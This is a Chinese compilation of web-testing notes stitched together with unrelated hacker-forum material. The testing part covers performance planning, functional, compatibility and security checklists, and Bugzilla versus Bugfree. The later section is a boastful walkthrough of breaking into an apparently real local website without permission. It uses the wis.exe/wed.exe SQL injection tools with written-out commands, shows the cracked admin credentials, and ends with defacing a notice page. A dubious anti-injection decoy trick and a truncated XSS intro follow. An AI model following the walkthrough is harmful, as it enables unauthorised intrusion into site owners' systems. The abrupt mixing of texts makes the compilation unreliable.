在每种不同的系统架构的实施中，开发人员可能选择不同的实现方式，造成实际情况纷繁复杂。我们不可能对每种技术都详细解说，这里只是介绍一种方法提供给你如何选择测试策略，从而帮助分析软件不同部分的性能指标，进而分析出整体架构的性能指标和性能瓶颈。

     由于工程和项目的不同，所选用的度量,评估方法也有不同之处。不过仍然有一些通用的步骤帮助我们完成一个性能测试项目。步骤如下

1．    制定目标和分析系统
2． 选择测试度量的方法
3． 学习的相关技术和工具
4． 制定评估标准
5． 测试环境建立

6． 设计测试用例

7． 运行测试用例

8． 分析测试结果

·制定目标和分析系统

   每一个性能测试计划中第一步都会制定目标和分析系统构成。只有明确目标和了解系统构成才会澄清测试范围，知道在测试中要掌握什么样的技术。   

目标：

1． 确定客户需求和期望

2． 实际业务需求

3． 系统需求

系统组成

   系统组成这里包含几方面含义：系统类别，系统构成，系统功能等。了解这些内容的本质其实是帮助我们明确测试的范围，选者适当的测试方法来进行测试。

   系统类别：分清系统类别是我们掌握什么样的技术的前提，掌握相应技术做性能测试才可能成功。例如：系统类别是bs结构,需要掌握http协议，java，html等技术。或者是cs结构，可能要了解操作系统，winsock，com等。所以甄别系统类别对于我们来说很重要。

   系统构成：硬件设置，操作系统设置是性能测试的制约条件，一般性能测试都是利用测试工具模仿大量的实际用户操作，系统在超负荷情形下运作。不同的系统构成性能测试就会得到不同的结果。

   系统功能：系统功能指系统提供的不同子系统，办公管理系统中的公文子系统，会议子系统等，系统工能是性能测试中要模拟的环节，了解这些是必要的。

·选择测试度量的方法

经过第一步，将会对系统有清醒的认识。接下来我们将把精力放在软件度量上，收集系统相关的数据。

度量的相关方面：

*制定规范

*制定相关流程,角色，职责

*制定改进策略

*制定结果对比标准

·学习的相关技术和工具

     性能测试是通过工具，模拟大量用户操作，对系统增加负载。所以需要掌握一定的工具知识才能进行性能测试。大家都知道性能测试工具一般通过winsock,http等协议纪录用户操作。而协议选择是基于软件的系统架构实现（web一般选择http协议,cs选择winsock协议），不同的性能测试工具，脚本语言也不同，比如rational robot中vu脚本用类c语言实现。

     开展性能测试需要对各种性能测试工具进行评估，因为每一种性能测试工具都有自身的特点，只有经过工具评估，才能选择符合现有软件架构的性能测试工具。确定测试工具后，需要组织测试人员进行工具的学习，培训相关技术。

·制定评估标准

        任何测试的目的都是确保软件符合预先规定的目标和要求。性能测试也不例外。所以必须制定一套标准。

     通常性能测试有四种模型技术可用于评估：

         *线性投射：用大量的过去的，扩展的或者将来可能发生的数据组成散布图，利用这个图表不断和系统的当前状况对比。

         *分析模型：用排队论公式和算法预测响应时间，利用描述工作量的数据和系统本质关联起来

         *模仿：模仿实际用户的使用方法测试你的系统

         *基准：定义测试和你最初的测试作为标准，利用它和所有后来进行的测试结果进行对比

 测试环境建立

1） 整个测试环境系统的安装；

2） Web层系统的部署；

3） App层服务的安装；

4） DB层数据库的备份和还原；

5） 整个系统部署安装完成后，需要对系统功能进行测试检查（可以围绕着测试范围来进行）

 设计测试用例

   设计测试用例是在了解软件业务流程的基础上。设计测试用例的原则是受最小的影响提供最多的测试信息，设计测试用例的目标是一次尽可能的包含多个测试要素。这些测试用例必须是测试工具可以实现的，不同的测试场景将测试不同的功能。因为性能测试不同于平时的测试用例，尽可能把性能测试用例设计的复杂，才有可能发现软件的性能瓶颈。

   1．测试数据生成

对于数据生成的方法，我主要是编写SQL语句来完成，另外还可以使用一些辅助工具，例如：DataFactory。

大数据量的生成，要注意SQL语句的有效性，尽量减少数据生成时所需要的时间；另外在数据生成过程中，可以进行脚本的准备。

注意：在数据生成之前，要考虑数据库文件的数量，因为数据文件均匀分布对整个性能测试结果很有影响，这是我们的血泪经验。

 2．测试脚本准备

根据不同的测试工具，编写脚本的方式不一样，但是其流程大致是一样的：

录制—〉回放—〉一些数据的参数化、添加一些验证条件—〉回放

注意：参数化数据的随机性会影响性能测试结果；

 运行测试用例

  1．预测试

测试相关工作准备完成后，我们可以开始预测试了；

预测试的目的主要是优化和调整系统；它是一个反复迭代的过程；

2．性能优化和调整

性能优化和调整是整个性能测试工作的核心和关键；

主要根据测试过程中所得到的系统计数器值来判断系统瓶颈所在，这里需要一些经验；我对性能优化和调整的认识主要如下：

1） Web层，主要在于对IIS的优化；对于基于.NET Framewoek的Web站点，还可以修改相关的参数来进行优化；

2） App层，目前我们的系统都是在功能完成后才对系统进行性能测试的；所以我们对代码的优化工作机会为零，这是一个遗憾，但也是整个性能优化和调整的一大部分工作所在。

3） DB层，数据库层的性能优化是我们整个性能优化的核心，我们主要围绕着索引和存储过程来展开；这是一个相当漫长的一个过程，需要我们有耐心和毅力。

  3．正式测试

当预测试结果达到测试需求后，我们可以进行正式测试了；如果时间允许，我们可以进行进一步的性能优化和调整工作；但是实际上很多时候，我们没有这样的机会。

 通过性能测试工具运行测试用例。同一环境下作的性能测试得到的测试结果是不准确的，所以在运行这些测试用例的时候，需要用不同的测试环境，不同的机器配置上运行。

   ·分析测试结果

     运行测试用例后，收集相关信息，进行数据统计分析，找到性能瓶颈。通过排除误差和其他因素，让测试结果体现接近真实情况。不同的体系结构分析测试结果的方法也不同，bs结构我们会分析网络带宽，流量对用户操作响应的影响，而cs结构我们可能更关心会系统整体配置对用户操作的影响。

• 　　软件缺陷区别于软件bug,它是在测试过程中出现的对系统有影响的,但是在设计中没有的或者对修改后的bug测试和开发人员有不同意见等
• 　　软件未达到产品说明书标明的功能。
• 　　软件出现了产品说明书指明不会出现的错误。
• 　　软件功能超出产品说明书指明范围。
• 　　软件未达到产品说明书虽未指出但应达到的目标。
• 　　软件测试员认为软件难以理解、不易使用、运行速度缓慢，或者最终用户认为不好。

　　测试的主要方面：

　　一、功能测试

　　对于网站的测试而言，每一个独立的功能模块需要单独的测试用例的设计导出，主要依据为《需求规格说明书》及《详细设计说明书》，对于应用程序模块需要设计者提供基本路径测试法的测试用例。

　　1、链接测试

　　链接是Web应用系统的一个主要特征，它是在页面之间切换和指导用户去一些不知道地址的页面的主要手段。链接测试可分为三个方面：

　　1)测试所有链接是否按指示的那样确实链接到了该链接的页面;

　　2)测试所链接的页面是否存在;

　　3)保证Web应用系统上没有孤立的页面，所谓孤立页面是指没有链接指向该页面，只有知道正确的URL地址才能访问。

　　链接测试可以自动进行，现在已经有许多工具可以采用。链接测试必须在集成测试阶段完成，也就是说，在整个Web应用系统的所有页面开发完成之后进行链接测试。

　　Xenu------主要测试链接的正确性的工具

　　可惜的是对于动态生成的页面的测试会出现一些错误。

　　2、表单测试

　　当用户给Web应用系统管理员提交信息时，就需要使用表单操作，例如用户注册、登陆、信息提交等。在这种情况下，我们必须测试提交操作的完整性，以校验提交给服务器的信息的正确性。例如：用户填写的出生日期与职业是否恰当，填写的所属省份与所在城市是否匹配等。如果使用了默认值，还要检验默认值的正确性。如果表单只能接受指定的某些值，则也要进行测试。例如：只能接受某些字符，测试时可以跳过这些字符，看系统是否会报错。

　　要测试这些程序，需要验证服务器能正确保存这些数据，而且后台运行的程序能正确解释和使用这些信息。

　　B/S结构实现的功能可能主要的就在这里，提交数据，处理数据等如果有固定的操作流程可以考虑自动化测试工具的录制功能，编写可重复使用的脚本代码，可以在测试、回归测试时运行以便减轻测试人员工作量。

　　我们对UM子系统中各个功能模块中的各项功能进行逐一的测试，主要测试方法为：边界值测试、等价类测试，以及异常类测试。测试中要保证每种类型都有2个以上的典型数值的输入，以确保测试输入的全面性。

　　3、Cookies测试

　　Cookies通常用来存储用户信息和用户在某应用系统的操作，当一个用户使用Cookies访问了某一个应用系统时，Web服务器将发送关于用户的信息，把该信息以Cookies的形式存储在客户端计算机上，这可用来创建动态和自定义页面或者存储登陆等信息。

　　如果Web应用系统使用了Cookies，就必须检查Cookies是否能正常工作而且对这些信息已经加密。测试的内容可包括Cookies是否起作用，是否按预定的时间进行保存，刷新对Cookies有什么影响等。

　　4、设计语言测试

　　Web设计语言版本的差异可以引起客户端或服务器端严重的问题，例如使用哪种版本的HTML等。当在分布式环境中开发时，开发人员都不在一起，这个问题就显得尤为重要。除了HTML的版本问题外，不同的脚本语言，例如Java、Javascrīpt、 ActiveX、VBscrīpt或Perl等也要进行验证。

　　5、数据库测试

　　在Web应用技术中，数据库起着重要的作用，数据库为Web应用系统的管理、运行、查询和实现用户对数据存储的请求等提供空间。在Web应用中，最常用的数据库类型是关系型数据库，可以使用SQL对信息进行处理。

　　在使用了数据库的Web应用系统中，一般情况下，可能发生两种错误，分别是数据一致性错误和输出错误。数据一致性错误主要是由于用户提交的表单信息不正确而造成的，而输出错误主要是由于网络速度或程序设计问题等引起的，针对这两种情况，可分别进行测试。

二、性能测试

　　网站的性能测试对于网站的运行而言异常重要，但是目前对于网站的性能测试做的不够，我们在进行系统设计时也没有一个很好的基准可以参考，因而建立网站的性能测试的一整套的测试方案将是至关重要的。

　　网站的性能测试主要从三个方面进行：连接速度测试、负荷测试(Load)和压力测试(Stress),

　　连接速度测试指的是打开网页的响应速度测试。负荷测试指的是进行一些边界数据的测试，压力测试更像是恶意测试，压力测试倾向应该是致使整个系统崩溃。

　　1、连接速度测试

　　用户连接到Web应用系统的速度根据上网方式的变化而变化，他们或许是电话拨号，或是宽带上网。当下载一个程序时，用户可以等较长的时间，但如果仅仅访问一个页面就不会这样。如果Web系统响应时间太长(例如超过5秒钟)，用户就会因没有耐心等待而离开。

　　另外，有些页面有超时的限制，如果响应速度太慢，用户可能还没来得及浏览内容，就需要重新登陆了。而且，连接速度太慢，还可能引起数据丢失，使用户得不到真实的页面。

　　2、负载测试

　　负载测试是为了测量Web系统在某一负载级别上的性能，以保证Web系统在需求范围内能正常工作。负载级别可以是某个时刻同时访问Web系统的用户数量，也可以是在线数据处理的数量。例如：Web应用系统能允许多少个用户同时在线?如果超过了这个数量，会出现什么现象?Web应用系统能否处理大量用户对同一个页面的请求?

　　3、压力测试

　　负载测试应该安排在Web系统发布以后，在实际的网络环境中进行测试。因为一个企业内部员工，特别是项目组人员总是有限的，而一个Web系统能同时处理的请求数量将远远超出这个限度，所以，只有放在Internet上，接受负载测试，其结果才是正确可信的。

　　进行压力测试是指实际破坏一个Web应用系统，测试系统的反映。压力测试是测试系统的限制和故障恢复能力，也就是测试Web应用系统会不会崩溃，在什么情况下会崩溃。黑客常常提供错误的数据负载，直到Web应用系统崩溃，接着当系统重新启动时获得存取权。

　　压力测试的区域包括表单、登陆和其他信息传输页面等。

　　采用的测试工具：

　　性能测试可以采用相应的工具进行自动化测试，我们目前采用如下工具

　　ab -----Apache 的测试工具

　　OpenSTA—开发系统测试架构

　　在很多情况下，web 站点不是孤立。Web 站点可能会与外部服务器通讯，请求数据、

　　验证数据或提交订单。

　　1、 服务器接口

　　第一个需要测试的接口是浏览器与服务器的接口。测试人员提交事务，然后查看服务器

　　记录，并验证在浏览器上看到的正好是服务器上发生的。测试人员还可以查询数据库，确认事务数据已正确保存。

　　2、 外部接口

　　有些 web 系统有外部接口。例如，网上商店可能要实时验证信用卡数据以减少欺诈行

　　为的发生。测试的时候，要使用 web 接口发送一些事务数据，分别对有效信用卡、无效信用卡和被盗信用卡进行验证。如果商店只使用 Visa 卡和 Mastercard 卡， 可以尝试使用 Discover 卡的数据。(简单的客户端脚本能够在提交事务之前对代码进行识别，例如 3 表示 American Express，4 表示 Visa，5 表示 Mastercard，6 代表Discover。)通常，测试人员需要确认软件能够处理外部服务器返回的所有可能的消息。

　　3、错误处理

　　最容易被测试人员忽略的地方是接口错误处理。通常我们试图确认系统能够处理所有错

　　误，但却无法预期系统所有可能的错误。尝试在处理过程中中断事务，看看会发生什么情况?

　　订单是否完成?尝试中断用户到服务器的网络连接。尝试中断 web 服务器到信用卡验证服

　　务器的连接。在这些情况下，系统能否正确处理这些错误?是否已对信用卡进行收费?如果

　　用户自己中断事务处理，在订单已保存而用户没有返回网站确认的时候，需要由客户代表致

　　电用户进行订单确认。

四、可用性测试

　　可用性/易用性方面目前我们只能采用手工测试的方法进行评判，而且缺乏一个很好的评判基准进行，此一方面需要大家共同讨论。

　　1、导航测试

　　导航描述了用户在一个页面内操作的方式，在不同的用户接口控制之间，例如按钮、对话框、列表和窗口等;或在不同的连接页面之间。通过考虑下列问题，可以决定一个Web应用系统是否易于导航：导航是否直观?Web系统的主要部分是否可通过主页存取?Web系统是否需要站点地图、搜索引擎或其他的导航帮助?

　　在一个页面上放太多的信息往往起到与预期相反的效果。Web应用系统的用户趋向于目的驱动，很快地扫描一个Web应用系统，看是否有满足自己需要的信息，如果没有，就会很快地离开。很少有用户愿意花时间去熟悉Web应用系统的结构，因此，Web应用系统导航帮助要尽可能地准确。

　　导航的另一个重要方面是Web应用系统的页面结构、导航、菜单、连接的风格是否一致。确保用户凭直觉就知道Web应用系统里面是否还有内容，内容在什么地方。

　　Web应用系统的层次一旦决定，就要着手测试用户导航功能，让最终用户参与这种测试，效果将更加明显。

　　2、图形测试

　　在Web应用系统中，适当的图片和动画既能起到广告宣传的作用，又能起到美化页面的功能。一个Web应用系统的图形可以包括图片、动画、边框、颜色、字体、背景、按钮等。图形测试的内容有：

　　(1)要确保图形有明确的用途，图片或动画不要胡乱地堆在一起，以免浪费传输时间。Web应用系统的图片尺寸要尽量地小，并且要能清楚地说明某件事情，一般都链接到某个具体的页面。

　　(2)验证所有页面字体的风格是否一致。

　　(3)背景颜色应该与字体颜色和前景颜色相搭配。

　　(4)图片的大小和质量也是一个很重要的因素，一般采用JPG或GIF压缩。

　　3、内容测试

　　内容测试用来检验Web应用系统提供信息的正确性、准确性和相关性。

　　信息的正确性是指信息是可靠的还是误传的。例如，在商品价格列表中，错误的价格可能引起财政问题甚至导致法律纠纷;信息的准确性是指是否有语法或拼写错误。这种测试通常使用一些文字处理软件来进行，例如使用Microsoft Word的"拼音与语法检查"功能;信息的相关性是指是否在当前页面可以找到与当前浏览信息相关的信息列表或入口，也就是一般Web站点中的所谓"相关文章列表"。

　　4、整体界面测试

　　整体界面是指整个Web应用系统的页面结构设计，是给用户的一个整体感。例如：当用户浏览Web应用系统时是否感到舒适，是否凭直觉就知道要找的信息在什么地方?整个Web应用系统的设计风格是否一致?

　　对整体界面的测试过程，其实是一个对最终用户进行调查的过程。一般Web应用系统采取在主页上做一个调查问卷的形式，来得到最终用户的反馈信息。

　　对所有的可用性测试来说，都需要有外部人员(与Web应用系统开发没有联系或联系很少的人员)的参与，最好是最终用户的参与。

五、兼容性测试

　　需要验证应用程序可以在用户使用的机器上运行。如果您用户是全球范围的，需要测试各种操作系统、浏览器、视频设置和 modem 速度。最后，还要尝试各种设置的组合。

　　1、平台测试

　　市场上有很多不同的操作系统类型，最常见的有Windows、Unix、Macintosh、Linux等。Web应用系统的最终用户究竟使用哪一种操作系统，取决于用户系统的配置。这样，就可能会发生兼容性问题，同一个应用可能在某些操作系统下能正常运行，但在另外的操作系统下可能会运行失败。

　　因此，在Web系统发布之前，需要在各种操作系统下对Web系统进行兼容性测试。

　　2、浏览器测试

　　浏览器是Web客户端最核心的构件，来自不同厂商的浏览器对Java，、Javascrīpt、 ActiveX、 plug-ins或不同的HTML规格有不同的支持。例如，ActiveX是Microsoft的产品，是为Internet Explorer而设计的，Javascrīpt是Netscape的产品，Java是Sun的产品等等。另外，框架和层次结构风格在不同的浏览器中也有不同的显示，甚至根本不显示。不同的浏览器对安全性和Java的设置也不一样。

　　测试浏览器兼容性的一个方法是创建一个兼容性矩阵。在这个矩阵中，测试不同厂商、不同版本的浏览器对某些构件和设置的适应性。

　　采用测试工具：

　　通过白盒测试或者黑盒测试导出的测试用例，采用相应的工具进行测试，可以采用OpenSTA进行测试，此测试工具可以采用不同的浏览器进行测试。

　　3.视频测试

　　页面版式在 640x400、600x800 或 1024x768 的分辨率模式下是否显示正常? 字体是否太小以至于无法浏览? 或者是太大? 文本和图片是否对齐?

　　4.Modem/连接速率测试

　　是否有这种情况，用户使用 28.8 modem下载一个页面需要 10 分钟，但测试人员在测

　　试的时候使用的是 T1 专线? 用户在下载文章或演示的时候，可能会等待比较长的时间，

　　但却不会耐心等待首页的出现。最后，需要确认图片不会太大。

　　5、打印机测试

　　用户可能会将网页打印下来。因此网页在设计的时候要考虑到打印问题，注意节约纸张和油墨。有不少用户喜欢阅读而不是盯着屏幕，因此需要验证网页打印是否正常。有时在屏幕上显示的图片和文本的对齐方式可能与打印出来的东西不一样。测试人员至少需要验证订单确认页面打印是正常的。

　　6、组合测试

　　最后需要进行组合测试。600x800 的分辨率在 MAC 机上可能不错，但是在 IBM 兼容

　　机上却很难看。在 IBM 机器上使用 Netscape 能正常显示，但却无法使用 Lynx 来浏览。

　　如果是内部使用的 web 站点，测试可能会轻松一些。如果公司指定使用某个类型的浏览器，

　　那么只需在该浏览器上进行测试。如果所有的人都使用 T1 专线，可能不需要测试下载施加。

　　(但需要注意的是，可能会有员工从家里拨号进入系统) 有些内部应用程序，开发部门可能

　　在系统需求中声明不支持某些系统而只支持一些那些已设置的系统。但是，理想的情况是，

　　系统能在所有机器上运行，这样就不会限制将来的发展和变动。

六、安全测试

　　Web应用系统的安全性测试区域主要有：

　　1、 目录设置

　　Web 安全的第一步就是正确设置目录。每个目录下应该有 index.html 或 main.html 页

　　面，这样就不会显示该目录下的所有内容。如果没有执行这条规则。那么选中一幅图片，单击鼠标右键，找到该图片所在的路径"… com/objects/images"。然后在浏览器地址栏中手工输入该路径，发现该站点所有图片的列表。这可能没什么关系。但是进入下一级目录 "…com/objects" ，点击 jackpot。在该目录下有很多资料，其中有些都是已过期页面。如果该公司每个月都要更改产品价格信息，并且保存过期页面。那么只要翻看了一下这些记录，就可以估计他们的边际利润以及他们为了争取一个合同还有多大的降价空间。如果某个客户在谈判之前查看了这些信息，他们在谈判桌上肯定处于上风。

　　2.登录

　　现在的Web应用系统基本采用先注册，后登陆的方式。因此，必须测试有效和无效的用户名和密码，要注意到是否大小写敏感，可以试多少次的限制，是否可以不登陆而直接浏览某个页面等。

　　3.Session

　　Web应用系统是否有超时的限制，也就是说，用户登陆后在一定时间内(例如15分钟)没有点击任何页面，是否需要重新登陆才能正常使用。

　　4.日志文件

　　为了保证Web应用系统的安全性，日志文件是至关重要的。需要测试相关信息是否写进了日志文件、是否可追踪。

　　5.加密

　　当使用了安全套接字时，还要测试加密是否正确，检查信息的完整性。

　　6.安全漏洞

　　服务器端的脚本常常构成安全漏洞，这些漏洞又常常被黑客利用。所以，还要测试没有经过授权，就不能在服务器端放置和编辑脚本的问题。

　　目前网络安全问题日益重要，特别对于有交互信息的网站及进行电子商务活动的网站尤其重要。目前我们的测试没有涵盖网站的安全性的测试，我们拟定采用工具来测定，

　　工具如下

　　SAINT------- Security Administrator’s Integrated Network Tool

　　此工具能够测出网站系统的相应的安全问题，并且能够给出安全漏洞的解决方案，不过是一些较为常见的漏洞解决方案。

七、代码合法性测试

　　代码合法性测试主要包括2个部分：程序代码合法性检查与显示代码合法性检查。

　　1、程序代码合法性检查

　　程序代码合法性检查主要标准为《intergrp小组编程规范》，目前采用由SCM管理员进行规范的检查，未来期望能够有相应的工具进行测试。

　　2、显示代码合法性检查

　　显示代码的合法性检查，主要分为Html、Javascrīpt、Css代码检查，目前采用

　　HTML代码检查------采用CSE HTML Validator进行测试

　　Javascrīpt、Css也可以在网上下载相应的测试工具。

　　八、 文档测试

　　l、产品说明书属性检查清单

　　1)完整.是否有遗漏和丢失，完全吗? 单独使用是否包含全部内容

　　2)准确.既定解决方案正确吗? 目标明确吗? 有没有错误?

　　3)精确、不含糊、清晰.描述是否一清二楚? 还是自说自话?容易看懂和理解吗?

　　4)一致.产品功能能描述是否自相矛盾,与其他功能有没有冲突

　　5)贴切.描述功能的陈述是否必要?有没有多余信息? 功能是否原来的客户要求?

　　6)合理.在特定的预算和进度下,以现有人力,物力和资源能否实现?

　　7)代码无关.是否坚持定义产品,而不是定义其所信赖的软件设计,架构和代码

　　8)可测试性.特性能否测试? 测试员建立验证操作的测试程序是否提供足够的信息?

　　2、 产品说明书用语检查清单

　　1)说明。 对问题的描述通常表现为粉饰没有仔细考虑的功能----可归结于前文所述的属性.从产品说明书上找出这样的用语,仔细审视它们在文中是怎样使用的.产品说明书可能会为其掩饰和开脱,也可能含糊其词----无论是哪一种情况都可视为软件缺陷.

　　2)总是,每一种,所有,没有,从不.如果看到此类绝对或肯定的,切实认定的叙述,软件测试员就可以着手设计针锋相对的案例.

　　3)当然,因此,明显,显然,必然.这些话意图诱使接受假定情况.不要中了圈套.

　　4)某些,有时,常常,通常,惯常,经常,大多,几乎.这些话太过模糊."有时"发生作用的功能无法测试.

　　5)等等,诸如此类,依此类推.以这样的词结束的功能清单无法测试.功能清单要绝对或者解释明确,以免让人迷惑,不知如何推论.

　　6)良好,迅速,廉价,高效,小,稳定.这些是不确定的说法,不可测试.如果在产品说明书中出现,就必须进一步指明含义.

　　7)已处理,已拒绝,已忽略,已消除.这些廉洁可能会隐藏大量需要说明的功能.

　　8)如果...那么...(没有否则).找出有"如果...那么..."而缺少配套的"否则"结构的陈述.想一想"如果"没有发生会怎样.

　　相关的测试工具

　　OpenSTA

　　主要做性能测试的负荷及压力测试，使用比较方便，可以编写测试脚本，也可以先行自动生成测试脚本，而后对于应用测试脚本进行测试。

　　SAINT

　　网站安全性测试，能够对于指定网站进行安全性测试，并可以提供安全问题的解决方案。

　　CSE HTML Validator

　　一个有用的对于HTML代码进行合法性检查的工具

　　Ab(Apache Bench)

　　Apache自带的对于性能测试方面的工具，功能不是很多，但是非常实用。

　　Crash-me

　　Mysql自带的测试数据库性能的工具，能够测试多种数据库的性能。

Bugzilla(v3.2.2)中的BUG解决方案有如下7种：

1. Fixed：已修复，即BUG中描述的与需求或设计不一致的问题已解决，不再出现。
2. Duplicate：重复的，该BUG与另外一个BUG描述的问题是一样的。
3. WontFix：不处理，该BUG无足轻重。
4. WorksForMe：无法重现，开发人员无法复现该BUG。
5. Invalid：无效的，开发人员认为该BUG不是一个缺陷，可能是设计问题或系统环境配置不正确。
6. Moved：已转移，转移到别的BUG分类或别的版本下。
7. Later：推迟，该BUG在当前版本不易处理，推迟处理或在新版本中处理。

Bugfree(v1.1)中一个Bug有7种解法（摘自Bugfree文档）：

1. By Design - 就是这么设计的，无效的Bug
2. Duplicate - 这个问题别人已经发现了，重复的Bug
3. External - 是个外部因素(比如浏览器、操作系统、其他第3方软件)造成的问题
4. Fixed - 问题被修理掉了。Tester要尽可能找到这种Bug
5. Not Repro - 无法复现你这个问题，无效的Bug
6. Postponed - 是个问题，但是目前不必修理了，推迟到以后再解
7. Won't Fix - 是个问题，但是不值得修理了，不管它吧

bugzilla与bugfree的对比

说起流光、溯雪、乱刀，可以说是大名鼎鼎无人不知无人不晓，这些都是小榕哥的作品。每次一提起小榕哥来，我的崇拜景仰就如滔滔江水，连绵不绝~~~~（又来了！） 让我们崇拜的小榕哥最新又发布了SQL注入工具，这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强！偶用它来搞定我们本地的信息港，从寻找注入漏洞到注入攻击成功，通过准确计时，总共只用了3分还差40秒，呵呵，王者风范，就是强啊！不信吗？看看我的入侵过程吧。

　　一、下载榕哥的工具包
　　小榕哥的这个SQL注入攻击工具包在榕哥的站点http://www.netxeyes.com/main.html可以下载到，不过这个工具太火爆了，下载的人实在太多，你觉得慢的话，可以到其它大的黑软站点搜索一下，绝对可以找到的。
　　下载来的这个工具包中总有两个小程序："wed.exe"和"wis.exe"，其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的；"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单，结合起来，就可以完成从寻找注入点到注入攻击完成的整个过程。

　　二、寻找SQL注入点
　　"wis.exe"使用的格式如下："wis.exe 网址"，这里以笔者检测本地信息港为例：首先打开命令提示窗口，输入如下命令："wis.exe http://www.as.***.cn/"。

小提示：在输入网址时，前面的"http://";和最后面的"/"是必不可少的，否则将会提示无法进行扫描。

　　输入完毕后回车，即可开始进行扫描了。很快得到了扫描结果，可以看到这个网站中存在着很多SQL注入漏洞，我们随便挑其中一个来做试验，就挑"/rjz/sort.asp?classid=1"吧。

打开浏览器，在地址栏中输入"http://www.as.***.cn/rjz/sort.asp?classid=1"，打开了网站页面，呵呵，原来是一个下载网页。现在来对它进行SQL注入，破解出管理员的帐号来吧！

　三、SQL注入破解管理员帐号
　　现在进入命令窗口中，使用刚才下载的工具包中的"wed.exe"程序，命令使用格式为："wed.exe 网址"输入如下命令："wed.exe http://www.as.***.cn/rjz/sort.asp?classid=1"。回车后可看到命令运行情况。

小提示：这次输入网址时，最后面千万不要加上那个"/"，但前面的"http://";头也还是必不可少的。

　　可以看到程序自动打开了工具包中的几个文件，"C:\wed\wed\TableName.dic"、
"C:\wed\wed\UserField.dic"和"C:\wed\wed\PassField.dic"，这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件，不过想想小榕哥以前出的"黑客字典"那么的强大，还用得着去多此一举吗？
　　在破解过程中还可以看到"SQL Injection Detected."的字符串字样，表示程序还会对需要注入破解的网站进行一次检测，看看是否存在SQL注入漏洞，成功后才开始猜测用户名。
　　开始等待吧！呵呵，很快就获得了数据库表名"admin"，然后得到用户表名和字长，为"username"和"6"；再检测到密码表名和字长，为"password"和"8"。看来用户的密码还起得挺长的呢，如果手工破解出这个用户密码来，一定要花上不少时间的！

正想着手工注入会有多困难时，"wed.exe"程序已经开始了用户名和密码的破解。很快的，就得到了用户名和密码了——"admina"、"pbk&7*8r"！天啦，这也太容易了吧！还不到一分钟呢

四、搜索隐藏的管理登录页面
　　重新回到刚才的软件下载页面中，任意点击了一个软件下载链接，哎呀？怎么可以随便下载的呢！不像以前碰到的收费网站，要输入用户名和密码才可以下载。看来这是免费下载的网站，我猜错了攻击对象，不过既然都来了，就看看有没有什么可利用的吧？
　　拿到了管理员的帐号，现在看来我们只有找到管理员登录管理的入口才行了。在网页上找遍了也没有看到什么管理员的入口链接，看来还是得让榕哥出手啦！
　　再次拿出"wis.exe"程序，这个程序除了可以扫描出网站中存在的所有SQL注入点外，还可以找到隐藏的管理员登录页面。在命令窗口中输入
"wis.exe http://www.as.***.cn/rjz/sort.asp?classid=1/ /a"。注意这里输入了一个隐藏的参数"/a"。

怎么会扫描不成功呢？呵呵，原来这是扫描注入点，当然不能成功了，管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入"wis.exe http://www.as.***.cn/ /a"，对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描，在扫描过程中，找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了，在最后以列表显示在命令窗口中。可以看到列表中有多个以"/rjz/"开头的登录页面网址，包括"/rjz/gl/manage.asp"、"/rjz/gl/login.asp"、"/rjz/gl/admin1.asp"等。就挑"/rjz/gl/admin1.asp"吧，反正这些都是管理员登录的页面想用哪个都可以。
　　在浏览器中输入网址" http://www.as.***.cn/rjz/gl/admin1.asp"，呵呵，出现了本来隐藏着的管理员登录页面。输入用户名和密码，就进入到后台管理系统，进来了做些什么呢？当然不能搞破坏啦，看到有一个添加公告的地方，好啊，就在这儿给管理员留下一点小小的通知吧！

看看最后我更改过的主页，冰河洗剑的大名留在了信息港上，不过可没有破坏什么东西啊！我和网页管理员也是朋友，他会原谅我这个小小的玩笑吧！？

SQL注入是什么？

　　许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码（一般是在浏览器地址栏进行,通过正常的www端口访问），根据程序返回的结果，获得某些想得知的数据，这就是所谓的SQL Injection，即SQL注入。
网站的恶梦——SQL注入

　　SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

防御SQL注入有妙法

　　第一步：很多新手从网上下载SQL通用防注入系统的程序，在需要防范注入的页面头部用 来防止别人进行手动注入测试（。

　　可是如果通过SQL注入分析器就可轻松跳过防注入系统并自动分析其注入点。然后只需要几分钟，你的管理员账号及密码就会被分析出来。

第二步：对于注入分析器的防范，笔者通过实验，发现了一种简单有效的防范方法。首先我们要知道SQL注入分析器是如何工作的。在操作过程中，发现软件并不是冲着“admin”管理员账号去的，而是冲着权限（如flag=1）去的。这样一来，无论你的管理员账号怎么变都无法逃过检测。

　　第三步：既然无法逃过检测，那我们就做两个账号，一个是普通的管理员账号，一个是防止注入的账号，为什么这么说呢？笔者想，如果找一个权限最大的账号制造假象，吸引软件的检测，而这个账号里的内容是大于千字以上的中文字符，就会迫使软件对这个账号进行分析的时候进入全负荷状态甚至资源耗尽而死机。下面我们就来修改数据库吧。

　　1.对表结构进行修改。将管理员的账号字段的数据类型进行修改，文本型改成最大字段255（其实也够了，如果还想做得再大点，可以选择备注型），密码的字段也进行相同设置。

　　2.对表进行修改。设置管理员权限的账号放在ID1，并输入大量中文字符（最好大于100个字）。

　　3.把真正的管理员密码放在ID2后的任何一个位置（如放在ID549上）。

　　我们通过上面的三步完成了对数据库的修改。

　　这时是不是修改结束了呢？其实不然，要明白你做的ID1账号其实也是真正有权限的账号，现在计算机处理速度那么快，要是遇上个一定要将它算出来的软件，这也是不安全的。我想这时大多数人已经想到了办法，对，只要在管理员登录的页面文件中写入字符限制就行了！就算对方使用这个有上千字符的账号密码也会被挡住的，而真正的密码则可以不受限制。

本文来源：黑客基地

本文主要介绍跨站脚本执行漏洞的成因，形式，危害，利用方式，隐藏技巧，解决方法和常见问题 （FAQ），由于目前介绍跨站脚本执行漏洞的资料还不是很多，而且一般也不是很详细，所以希望本文能够 比较详细的介绍该漏洞。由于时间仓促，水平有限，本文可能有不少错误，希望大家不吝赐教。

